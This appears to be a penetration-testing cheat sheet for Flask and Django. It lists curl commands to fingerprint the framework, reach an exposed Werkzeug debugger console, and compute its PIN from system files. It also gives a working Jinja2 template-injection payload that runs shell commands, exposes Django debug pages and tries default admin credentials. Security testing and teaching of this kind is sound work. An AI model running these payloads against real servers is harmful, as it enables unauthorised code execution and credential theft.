Flask / Django

What it is: Python web frameworks. Flask is lightweight (uses Werkzeug/Jinja2), Django is full-featured. Flask debug mode (Werkzeug debugger) is an instant RCE. Jinja2 SSTI is the other primary attack vector.

Default ports: 5000 (Flask), 8000 (Django), 80, 443

Vuln research:


Detect Flask/Django

Headers and debug pages reveal the framework

curl -sI http://$IP/ | grep -i server
# Werkzeug = Flask

Werkzeug debugger RCE

Flask debug mode exposed — Interactive Python console

curl http://$IP/console
# If you see the Werkzeug debugger console:
# Enter: import os; os.popen('id').read()
# If PIN protected, calculate from /etc/passwd, /sys/class/net/eth0/address, /etc/machine-id

Flask SSTI (Jinja2)

Server-side template injection — Test with math expressions

curl "http://$IP/search?q={{7*7}}"
# RCE:
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

Django debug mode

Exposes settings, SQL queries, and paths — Information disclosure

curl http://$IP/nonexistent_path_12345
# Debug page reveals: URL patterns, installed apps, database settings, SECRET_KEY

Django admin panel

Default admin interface — Try common credentials

curl http://$IP/admin/
# Default: admin:admin, admin:password